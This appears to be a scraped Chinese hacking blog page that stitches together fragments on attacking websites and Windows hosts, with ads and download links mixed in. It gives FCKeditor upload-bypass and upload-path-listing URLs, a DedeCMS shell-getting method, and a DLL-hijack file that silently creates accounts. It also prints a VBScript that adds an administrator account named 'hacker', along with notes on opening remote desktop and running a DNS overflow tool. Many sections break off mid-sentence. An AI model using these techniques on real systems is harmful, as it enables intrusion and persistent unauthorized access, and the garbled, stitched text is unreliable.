菜鸟一枚，大牛不要嘲笑。

关于交换友链

FCk的漏洞，本文会增加自己的经验以及网络收集的漏洞，集百家之所长。

1、查看编辑器版本
FCKeditor/_whatsnew.html 

FCKeditor/editor/dialog/fck_about.html
2、Version 2.2 版本
Apache+linux 环境下在上传文件后面加个.突破！测试通过。
3、Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。

在得到网站后台的账号密码
很多网站后台上传文件之后自动重名名。
这里给大家提供一种老方法了。

上传文件一般是uploa

FCKeditor
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径
FCKeditor编辑器页
FCKeditor/_samples/default.html

查看编辑器版本
FCKeditor/_whatsnew.html

查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径

Note:[Hell1]截至2010年02月15日最新版本为FCKeditor v2.6.6

领先的 Web 技术教程 – 全部免费

在w3school，你可以找到你所需要的所有的网站建设教程。

从基础的HTML到XHTML，乃至进阶的XML、SQL、数据库、多媒体和WAP

点击进入

http://115.com/file/dz10qz43 李炎恢asp1-31.rar

http://115.com/file/en5vq3w6 李炎恢asp32-60.rar

http://115.com/file/chtd8e94 李炎恢asp86-120.rar

http://115.com/file/en5vq7l8 李炎恢asp61-85.rar

http://115.com/file/agyhwl73 李炎恢asp121-150.rar

http://115.com/file/b7f6z6dj 李炎恢asp151-180.rar

http://115.com/file/dz0d6nfr 李炎恢asp181-200.rar

http://115.com/file/agzgmtgv 李炎恢老师XHTML视频教程1-18

互换友链的朋友请把本博客做好后跟贴留言，在线会第一时间给你添加。

诚心互换,非诚勿扰..

Blog：http://hi.baidu.com/%CB%D5%C9%FA1995/home

名称：苏生's Blog

服务器安全设置

>> IIS6.0的安装
　　 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件
　　 应用程序 ———ASP.NET（可选）
　　　　　　　 |——启用网络 COM+ 访问（必选）
　　　　　　　 |——Internet 信息服务(IIS)———Internet 信息服务管理器（必选）　
　　　　　　　　　　　　　　　　　　　　　 |——公用文件（必选）
　　　　　　　　　　　　　　　　　　　　　 |——万维网服务———Active Server pages（必选）

经测试，此方法通杀asp、aspx版本，不适用于php。

之前很多的方法，诸如上传*.asp等类型文件；创建*.asp等目录……

今天遇到一个fck编辑器，跟之前很多次一样，以上方法均无果。

创建*.asp；*.php等目录无果；上传*.asp;.jpg等文件无果；神马cer之类的就不说了。

以下是误打误撞的方法，不知道黑扩

转自：t00ls
网上流传的漏洞exp都是说要知道后台才能利用，但不用，只要 plus 目录存在，服务器能外连，就能拿shell
  _1 U- t( B- F8 c
前题条件，必须准备好自己的dede数据库，然后插入数据：

上传到sougou目录，注意不要改名字。等待该目录有文件联网的时候就自动添加系统账号了。

使用方法：把此文件放到QQ 迅雷 BT 等工具的同目录下。运行后会导致系统执行创建用户

                  需要创建的用户名和密码可以十六进制修改。

Ps：

一个程序的启动它会调用很多dll或者ocx组件，但是他是有一个顺序的。

比如这个迅雷，他启动时会调用Ws2Help.dll这个组件，

依赖于系统中的wscript.exe和cscript.exe添加账号：
添加一个账号为“hacker”密码为“123456”的系统账号：
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","hacker")
od.SetPassword "123456"
od.SetInfo
Set of=GetObject(os&"/hacker",user)

From:网络


CMD下开启3389服务
可能很多朋友拿下SHELL之后不能开对方的3389苦恼吧 呵呵
今天我就给大家介绍比较可行的方法


1、2000系统
简要说一下如何进行DNS溢出攻击。我用的溢出利用程序是dns.exe，在CMD下运行它可以看到它的使用参数等信息。执行"dns -s IP"命令检测目标IP是否存在DNS溢出漏洞，如图1。在图中我们可以看出目标主机存在DNS溢出漏洞，操作系统为Window

今天忽然想起来cmd删除后还有一个。就跟net.exe没了还有net1.exe一样,

 记录一下：

cmd没有了,还有command.com

大家可以,开始-运行-command.com

是不是有一个貌似cmd的东东出来了这个就是command.com。应该的复制CMD.EXE的..
因为只有WIN9X才用command.com
NT内核的都应该用CMD.EXE